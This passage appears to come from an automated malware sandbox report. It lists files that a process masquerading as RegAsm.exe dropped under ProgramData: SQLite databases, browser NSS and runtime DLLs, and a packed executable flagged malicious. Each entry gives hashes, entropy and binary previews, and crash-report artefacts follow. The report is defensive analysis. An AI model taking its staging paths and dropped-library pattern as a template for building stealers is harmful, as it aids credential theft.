SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\GIJJKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\HIDGCF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\KECBGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\KKFBAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: bind.aspx.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFHDBKFCAA\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJECFIECBGDG\AKFIDH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJECFIECBGDG\EBGCBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJECFIECBGDG\IDBAKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKFIDGDHJE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5661736
Entropy (8bit):	7.999897874450605
Encrypted:	true
SSDEEP:	98304:Eg2nmyTusqokbqW3alL1eMT8dq+5L34fs6DvS/GhE5ZyxDmwXQsZRqKoGgLNxeId:bryTusqok2kgeMIY+5L34f2MCkmwXdRk
MD5:	8D556F35D2768D27B334D0E76D4D3295
SHA1:	33F2FBFE5C2B3D3D470BBF28C20E15283E20717C
SHA-256:	2BDAB82A67299FF24CCA7E0884C17FAB80F45B364BA718142C80BDFBD573B581
SHA-512:	EADEC8014BC15D1F72C44E5A45A2546A450D3C529AECC21D850EA50EBDA1B5D47D569B4C6AEF4215C402DB87EFBAC7550736D28BC101D920F900EA80F83BC4EA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a].f.................4V.........~RV.. ...`V...@.. ........................V...........`.................................0RV.K....`V..............>V.(&....V......PV.............................................. ............... ..H............text....2V.. ...4V................. ..`.rsrc........`V......6V.............@..@.reloc........V......<V.............@..B................`RV.....H........@V.@.................................................................\..{...>..r.'...t.....U..I.s.d.L...P...,...j...\%.S......".i..B..q.p.ZIZ.$.A.]..m...r...o$......QI.;O.+3@6FN.W..g>.P.e.}........X....v-+.Y.\.z./a.6~.r.....u.+.)..I...7......DW...$;..Ex....s71&.!......t_..\.9....h..J0Oa/.l.t.Z[..z..Q.f..M...Z..J%..(.r%&.5..Qw.k..X.E.....k+!...k]y..&..u..p<o.!"T1..?...c.q..:3.N.sI.-$v..l..Y...z...V.!d.?(S.h..>.j...gA.p..=$..U..."45p.p..T..7..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_d92f9ce144c1913ea91516593a19cb772a1c4ed_0f4a0a05_c2357629-7ef6-4bff-b9a0-e153775f8777\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.084916889981113
Encrypted:	false
SSDEEP:	192:fuvc9eFy/WQ+y0uHCvjezEK0pzuiFOZ24IO8Z:AczJ+5uHCvjeKpzuiFOY4IO8Z
MD5:	C647F95CF75963B21CACAF812D9B7B3F
SHA1:	0C1AEA1FE8BEDAA9636759E6BC68C5799E45A77E
SHA-256:	D4AB1D4037EAE126B4B581AF298C03D0D1ED0FDDBF3C89E013D1D4CD759CEA07
SHA-512:	42ABAB029077CA5B83B6DF15009AFF29FE0B1B1102EA748F01E7BF8E73DBF4287575060FB20D4A967FE3F288D12CA51B215B8F2812CF4B9F3E5A2CE592551CED
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.6.7.4.2.6.6.4.3.7.6.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.6.7.4.2.7.4.2.5.0.2.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.3.5.7.6.2.9.-.7.e.f.6.-.4.b.f.f.-.b.9.a.0.-.e.1.5.3.7.7.5.f.8.7.7.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.f.5.7.3.9.7.-.f.5.7.7.-.4.b.d.3.-.8.9.2.a.-.3.c.1.9.b.e.2.f.f.c.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.b.4.-.0.0.0.1.-.0.0.1.5.-.0.0.e.a.-.7.2.d.2.5.5.1.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94AA.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Sep 28 03:23:47 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	109584
Entropy (8bit):	2.060261828135895
Encrypted:	false
SSDEEP:	384:IastdszPVj5HnJolwZpXqGo7oBRxR1nmsmDdsqAAygmY+18FSgLDO7H9Asm4mHv9:IaU+Vj5nJolSRxRG87H9DGIbz9A
MD5:	EB9DB17F070A57B1113DDAF3281CE4F7
SHA1:	83C99A38DFFB68AAA0205AF655371223295AB7D0
SHA-256:	2E1B69B20BD119AAD92454FDB9FF48BD16C2817D34C9F9A57F4D905F149E8718
SHA-512:	B1F3E4B5D78FBD1A7013CAF83731467497FBD7C23C0A4148AE7FBF112EB7852E96C8ECBACD684013F154C22042C6EB2D5BD32D0A3D564059182FCC62C3B3A135
Malicious:	false
Preview:	MDMP..a..... ........v.f....................................<...L%......d...>I..........`.......8...........T...........HE...f...........%..........t'..............................................................................eJ.......(......GenuineIntel............T............v.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9603.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6348
Entropy (8bit):	3.7310515089602427
Encrypted:	false
SSDEEP:	192:R6l7wVeJ/Hk6vDYDJlxprU89b8usfH80m:R6lXJvk6vDYDJlt8tfH2
MD5:	602BA841C97A3A23902514E333DC6164
SHA1:	D12BBAC5FA35183620E5BB6D0E4EC09D39E246FC
SHA-256:	B3A0DAE5E9E2825921FE3E2F5CA3AC51CCF7CFF78D09343B4759B3248CC8614A
SHA-512:	747D6EE8C8B84CF72A43B8C4DDDD55C0A930B458D9FBAF1781F6D1479C886B074262221DAF9782D0F7B07DBB6126E0B491EB972B692799E9DE4A7088F3B2B2AC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9623.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4686
Entropy (8bit):	4.502296797524892
Encrypted:	false
SSDEEP:	48:cvIwWl8zs4Jg77aI99qWpW8VYjHPYm8M4JfupVFf+q8okK1QgLuOLufrd:uIjf+I7fL7VaSJfuRvjBukufrd
MD5:	C029E237A0CDE1B96F1D689108CF50D6
SHA1:	C615D7FC4BCC00173A2EF4BB7D7557D5E8EAA957
SHA-256:	947885E68E5CA33E128F085FE3083FB784BDFD3ECD9631579CDE452B24814196
SHA-512:	ABB1B46676495FFAE33B9660161F2E1196EC77912A2BCCFA3087DBFC541C886C2071FFAD0F07EDF8A37DC477EF812DD3A64820A54B0784A88B3DB61732E3B74D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="519506" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GCGHJEBGHJ.exe.log

Download File

Process:	C:\ProgramData\GCGHJEBGHJ.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JKFIDGDHJE.exe.log

Download File

Process:	C:\ProgramData\JKFIDGDHJE.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
